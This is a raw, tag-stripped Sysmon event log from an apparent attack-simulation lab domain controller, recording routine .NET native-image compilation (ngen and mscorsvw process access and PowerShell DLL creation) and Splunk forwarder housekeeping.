21:04:02.711{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C2-60D3-8F03-00000000CF01}6452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.711{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C2-60D3-8F03-00000000CF01}6452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020520Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.539{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C2-60D3-8E03-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.524{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C2-60D3-8E03-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020518Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.524{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C2-60D3-8E03-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020517Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:02.445{4DB9351A-A1C1-60D3-8D03-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1920-0\Microsoft.PowerShell.Activities.dll2021-06-23 21:04:02.445 23542300x800000000000000020516Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.352{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91BB5E8A8D18A3CBD185BC766A9428FA,SHA256=BE96E1E8316A3F0E629894C99166D4B95DAD4035E49121E382D08B1CD6EACA8C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020515Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.143{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61421-false10.0.1.12-8000- 10341000x800000000000000020536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:03.727{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C3-60D3-9203-00000000CF01}6264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:03.711{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C3-60D3-9203-00000000CF01}6264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:03.711{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C3-60D3-9203-00000000CF01}6264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:03.664{4DB9351A-A1C3-60D3-9103-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\df8-0\Microsoft.PowerShell.Commands.Diagnostics.dll2021-06-23 21:04:03.664 23542300x800000000000000020532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:03.649{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F27C777EF68831C0E4626862DAB5F99,SHA256=7323F955A842FC4389161B983F16E286CA73AA140D3DDDEED81D98ABABC82933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:03.508{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD4ABC9E3274259C34BAD53B35A6A350,SHA256=929E9E5C23F6519645EBE2A31D0E4A7626185FDBF8898ABC3987FB3EE62F26E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:03.149{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C3-60D3-9103-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:03.117{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C3-60D3-9103-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:03.117{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C3-60D3-9103-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:04.977{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1C4-60D3-9403-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:04.977{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C4-60D3-9403-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:04.914{4DB9351A-A1C4-60D3-9303-00000000CF01}5972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1754-0\Microsoft.PowerShell.Commands.Management.dll2021-06-23 21:04:04.914 23542300x800000000000000020541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:04.758{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37BA5319F8AC08D0576C72068BC29BFA,SHA256=AD5F4E61A9814DE4BC30CC3DD32820EEB0E50821D2DDF2963DB6135BBC5CC605,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:04.523{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0020AEBDD67A2D48F67559590C75044,SHA256=425C285467716266E7B4AC3A29F91D8D00118DF742CF70D8EDB5E703CA02B639,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:04.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C4-60D3-9303-00000000CF01}5972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:04.055{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C4-60D3-9303-00000000CF01}5972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:04.055{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C4-60D3-9303-00000000CF01}5972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:05.664{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81F6DD525E6DC9307B3C58AFFED20207,SHA256=591F3582EC22E57C7F350AB2CA74FA75C822D92151EFC9A5E030A940B824C56F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:05.352{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C5-60D3-9503-00000000CF01}6356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:05.336{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1C5-60D3-9503-00000000CF01}6356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:05.336{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C5-60D3-9503-00000000CF01}6356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 